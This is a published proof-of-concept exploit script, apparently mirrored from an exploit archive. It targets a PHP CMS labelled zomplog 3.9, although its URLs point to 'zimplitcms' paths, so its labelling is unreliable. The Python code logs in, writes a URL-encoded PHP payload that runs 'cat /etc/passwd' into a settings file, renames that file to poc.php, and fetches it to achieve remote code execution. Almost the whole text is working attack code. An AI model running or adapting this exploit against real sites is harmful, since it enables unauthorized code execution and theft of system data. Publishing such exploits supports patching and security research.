Share
## https://sploitus.com/exploit?id=PACKETSTORM:173806
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog
#Version: v3.9
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
#inputs
username=input('username: ')
password=input('password: ')
#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"
#login
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
'Cookie' : 'ZsessionLang=en',
'Content-Type' : 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
login_req=session.post(login_url,headers=headers,data=login_data)
if login_req.status_code == 200:
print('Login OK')
else:
print('Login promlem.')
exit()
#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
'Content-Type' : 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)
#rename
rename_req=session.get(rename_url)
#poc
poc_req=session.get(poc_url)
print(poc_req.text)
#youtube poc video - https://youtu.be/nn7hieGyCFs